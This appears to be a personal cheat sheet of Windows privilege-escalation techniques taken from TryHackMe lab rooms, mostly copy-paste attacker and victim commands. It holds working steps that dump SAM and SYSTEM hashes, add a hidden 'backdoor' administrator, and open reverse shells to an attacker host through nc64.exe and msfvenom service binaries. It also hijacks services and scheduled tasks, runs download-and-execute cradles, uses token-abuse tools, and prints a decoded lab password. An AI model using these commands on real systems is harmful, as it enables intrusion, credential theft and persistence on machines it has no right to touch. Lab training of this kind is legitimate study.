Copy info from here: https://tryhackme.com/room/windowsprivesc20
Gathering Info
Copy systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Copy dir "c:\program files"
Copy dir "c:\program files (x86)"
Copy wmic service get name,startname
Copy wmic service get name,pathname,startname | findstr "Program Files" Find text in file
Copy type C:\Windows\path\to\file\$FILE | findstr $STRING Find passwords
Copy reg query HKLM /f password /t REG_SZ /s
Whoami /priv
Printspoofer - works on Windows 10 and Server 2016/2019
Harvesting Passwords from Usual Spots
Might be able to find interesting files by looking at what was recently accessed. Start -> run -> recent.
Powershell history
Examples
Victim(cmd)
Copy type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt Examples
Need GUI to see other command prompt that will be spawned
Victim(cmd)
Copy cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exe Examples
Retrieve the saved password stored in the saved PuTTY session under your profile.
Victim(cmd)
Copy reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s See hidden files
Examples
Anthem
System and Sam
Download system and sam
Examples
Kali(WinRM)
Copy reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak Dump hashes
Examples
Kali
Copy python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
Add User & Assign Group Memberships
Victim
Copy net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f Enable RDP
Victim
Copy reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Add user to RDP Group
Examples
Add user to group that allows them to RDP
Victim(cmd)
Copy net localgroup "Remote Management Users" $USER /add Scheduled Tasks
Examples
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:
Victim(cmd)
Victim(cmd)
Copy schtasks /query /tn $TASK /fo list /v Victim(cmd)
Copy icacls c:\tasks\schtask.bat Kali
Victim
Copy echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK
Abusing Service Misconfigurations
Examples
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
Copy sc qc WindowsScheduler Victim(cmd)
Copy icacls C:\PROGRA~2\SYSTEM~1\WService.exe Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81 Victim(Powershell)
Copy wget http://$KALI:81/rev-svc.exe -O rev-svc.exe Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
Victim(Powershell)
Copy cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F Kali
Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
Copy sc stop windowsscheduler
sc start windowsscheduler OR
Victim(Powershell)
Copy sc.exe stop windowsscheduler
sc.exe start windowsscheduler Unquoted Service Paths
Examples
Victim(cmd)
Copy sc qc "disk sorter enterprise" Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81 Victim(Powershell)
Copy wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F Kali
Victim(cmd)
Copy sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise" Insecure Service Permissions
Examples
Victim(cmd)
Copy cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81 Victim(Powershell)
Copy wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe Kali
Victim(Powershell)
Copy icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService Abusing dangerous privileges
Examples
Kali
Victim(Browser)
Copy c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442" Bypassing UAC
Examples:
Bypassing UAC
Bypassing Applocker
Examples:
Load PowerUp.ps1 into memory.
Kali
Copy wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81 Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
PowerUp.ps1
Victim(powershell)
Copy powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
Kali
Copy echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d Kali
Copy xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T Privilege Escalation
Automated Enumeration Tools
Windows Exploit Suggester
Copy git clone https://github.com/BloodHoundAD/BloodHound.git
Juicy Potato
Examples
Retro
Download Juicy Potato to your attack machine
Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.)
Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.) use Juicy Potato to execute your reverse shell
Copy wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Copy JuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *
PowerUp.ps1
Examples
Privilege Escalation Retro
Setup
Kali
Copy wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81 Victim(cmd)
Copy certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks OR
Victim(powershell)
Copy powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
Windows Exploit Suggester
Examples
HackPark
Setup
Run command then paste output back to Kali in a file called systeminfo.txt
Victim
Kali
Copy git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt WinPeas
Examples
HackPark
Setup
Kali
Copy wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82 Victim
Copy cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
SharpHound
Examples
Post-Exploitation Basics
Add this line to SharpHound.ps1 before transferring so I could run the command right away
Victim
Copy powershell -ep bypass
.\SharpHound.ps1 Kali
Copy apt-get install bloodhound
neo4j console
bloodhound --no-sandbox Find all Domain Admins
List all Kerberostable accounts
Powerview
Examples
Post-Exploitation Basics
Victim
Run below to be able to run PowerView commands.
Copy powershell -ep bypass
. .\Downloads\PowerView.ps1 Enumerate the domain users.
Copy Get-NetUser | select cn Enumerate the domain groups.
Copy Get-NetGroup -GroupName *admin* Find Shared folders.
Get Operating systems on the network.
Copy Get-NetComputer -fulldata | select operatingsystem
Last updated 5 months ago
